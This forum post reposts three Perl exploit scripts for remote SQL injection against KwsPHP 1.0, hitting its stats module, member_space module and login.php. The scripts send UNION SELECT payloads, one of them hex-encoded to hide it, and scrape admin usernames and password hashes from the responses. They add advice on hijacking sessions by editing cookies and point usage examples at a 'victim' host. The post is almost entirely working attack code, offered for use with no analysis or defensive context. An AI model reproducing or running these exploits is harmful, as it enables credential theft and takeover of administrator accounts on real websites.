Jump to content
Ras

KwsPHP stats/member_space/login.php Remote SQL Injections

Recommended Posts

Posted

stats module:

###################################################
# Script..........................: KwsPHP ver 1.0 stats Module
# Script Site..................: [url]http://kws.koogar.org/[/url]
# Vulnerability...............: Remote SQL injection Exploit
# Access.........................: Remote
# level.............................: Dangerous
# Author..........................: S4mi
# Contact.........................: S4mi[at]LinuxMail.org
####################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
#
####################################################
# This Exploit Work Only When magic_quotes_gpc Is OFF
#
#Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin
#Result Screen Shot :
#+**********************+
# Connecting ...[OK]
# Sending Data ...[OK]
#
# + Exploit succeed! Getting admin information.
# + ---------------- +
# + Username: admin
# + Password: e10adc3949ba59abbe56e057f20f883e
###################################################
#vuln code : \modules\stats\index.php line ~ 700 - 720
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# [code]
# elseif(isset($aff) && ($aff=="browser"))
# {
# if(isset($typenav))
# {
# bloc_head("Statistiques des navigateurs ".$liste_navigateurs[$typenav]);
#
# $tot_nav=0;
#
# $requete=reqmysql("SELECT SUM(hit) as tot FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `type` ASC ");
#
# while ($ligne = mysql_fetch_object($requete))
# {
# $tot_nav = $ligne->tot;
# }
# $requete=reqmysql("SELECT * FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `hit` DESC");
#

#########################################################

#!/usr/bin/perl

use IO::Socket ;

&header();

&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));

$host = $ARGV[0];

$path = $ARGV[1];

$user = $ARGV[2];

syswrite STDOUT ,"\n Connecting ...";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "\n Unable to connect to $host\n" unless($sock);

syswrite STDOUT, "[OK]";

$inject = "9999'/**/UNION/**/SELECT/**/0,0,pass,pseudo/**/FROM/**/users/**/WHERE/**/pseudo='$user'/*";

syswrite STDOUT ,"\n Sending Data ...";

print $sock "POST $path/index.php?mod=stats&aff=browser&typenav=$inject HTTP/1.1\n";

print $sock "Host: $host\n";

print $sock "Referer: $host\n";

print $sock "Accept-Language: en-us\n";

print $sock "Content-Type: application/x-www-form-urlencoded\n";

print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";

print $sock "Cache-Control: no-cache\n";

print $sock "Connection: Close\n\n";

syswrite STDOUT ,"[OK]\n\n";

while($answer = <$sock>){

if ($answer =~ /nav_(.*?).png/){

print "+ Exploit succeed! Getting admin information.\n";

print "+ ---------------- +\n";

print "+ Username: $user\n";

print "+ Password: $1\n";

print "+ ----Have Fun---- +\n";

print "+ You don't need to crack the hash password :D\n";

print "+ Just login with ur owen information and edit the cookies\n";

}

}

sub usage{

print "\nUsage : perl $0 host /path/ UserName ";

print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n";

exit(0);

}

sub header(){

print q(

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Script......................: KwsPHP ver 1.0 stats Module

# Script Site.................: http://kws.koogar.org/

# Vulnerability...............: Remote SQL injection Exploit

# Access......................: Remote

# level.......................: Dangerous

# Author......................: S4mi

# Contact.....................: S4mi[at]LinuxMail.org

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

);

}

member_space module:

#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Cookies;

$host = $ARGV[0];
$User = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
$port = "80";

print q(
################################################################
# Script....................: KwsPHP v1.0 Member_Space Module #
# Script Site...............: [url]http://kws.koogar.org/[/url] #
# Vulnerability.............: Remote SQL injection Exploit #
# Access....................: Remote #
# level.....................: Dangerous #
# Author....................: S4mi #
# Contact...................: S4mi[at]LinuxMail.org #
# This Exploit Work Only When magic_quotes_gpc Is OFF #
################### (C)oded By S4mi ############################

);


if (@ARGV < 3) {
print " # usage : xpl.pl host/path/ User Passwd\n";
print " # e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n";
exit();
}

print " [~] User/Password : $User/$passwd \n";
print " [~] Host : $url \n";

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
print " [~] Logining ...\n";
$xpl->cookie_jar( $cookie_jar );
$login = $xpl->post($url.'index.php',
Content => [
"pseudo" => "$User",
"pass" => "$passwd",
"submit" => "Se connecter",
],);

$evil0 = "\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E"
."\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E"
."\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72"
."\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31"
."\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30"
."\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68"
."\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74"
."\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31"
."\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31"
."\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73"
."\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C"
."\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73"
."\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A"
."\x2F\x69\x64\x3D\x31\x2F\x2A";

$offset = "\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61"
."\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64"
."\x69\x74\x65\x72\x26\x69\x64\x3D";

$target = $xpl->get($url."index.php?mod=$offset$evil0");



if($target->as_string =~ /value="username:(.*?"/) {
$zaz = $1;
print " [+] Exploit succeed! Getting admin information. \n";
print " [+] ------------------------------------------- \n";
}
if($target->as_string =~ /value="password:(.*?"/) {
$luks = $1;
print " [+] UserName : $zaz \n";
print " [+] Password : $luks \n";
}
else {
print " [-] Exploit Failed ! \n";
}
print "\n#############################################################\n";

login.php:

###################################################
# Script..........................: KwsPHP ver 1.0
# Script Site..................: [url]http://kws.koogar.org/[/url]
# Vulnerability...............: login.php Remote SQL injection Exploit
# Access.........................: Remote
# level.............................: Dangerous
# Author..........................: S4mi
# Contact.........................: S4mi[at]LinuxMail.org
####################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
#
####################################################
# This Exploit work Only When magic_quotes_gpc Is OFF
#
#Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin
#Result Screen Shot :
#+**********************+
# Connecting ...[OK]
# Sending Data ...[OK]
#
# + Exploit succeed! Getting admin information.
# + ---------------- +
# + Username: admin
# + Password: e10adc3949ba59abbe56e057f20f883e
###################################################

#!/usr/bin/perl

use IO::Socket ;

&header();

&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));

$host = $ARGV[0];
$path = $ARGV[1];
$user = $ARGV[2];


syswrite STDOUT ,"\n Connecting ...";

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);

die "\n Unable to connect to $host\n" unless($sock);

syswrite STDOUT, "[OK]";

$inject = "union%20all%20select%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users%20where%20pseudo='$user'/*&pass=ZAZ&verifer=Se%20Loguer";

syswrite STDOUT ,"\n Sending Data ...";

print $sock "POST $path/login.php?pseudo=%22$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";

syswrite STDOUT ,"[OK]\n\n";

while($answer = <$sock>){

if ($answer =~ /class="messagelogin">(.*?) /){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ----------------------- +\n";
print "+ Username: $user\n";
print "+ Password: $1\n";
print "+ -------Have Fun--------- +\n";
print "+ You don't need to crack the hash password \n";
print "+ Just login with ur owen information and edit the cookies\n";
}
}

sub usage{
print "\nUsage : perl $0 host /path/ UserName ";
print "\nExemple : perl $0 [url]www.victim.com[/url] /KwsPHP/ admin\n";
exit(0);
}
sub header(){
print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script......................: KwsPHP ver 1.0
# Script Site.................: [url]http://kws.koogar.org/[/url]
# Vulnerability...............: Remote SQL injection Exploit
# Access......................: Remote
# level.......................: Dangerous
# Author......................: S4mi
# Contact.....................: S4mi[at]LinuxMail.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...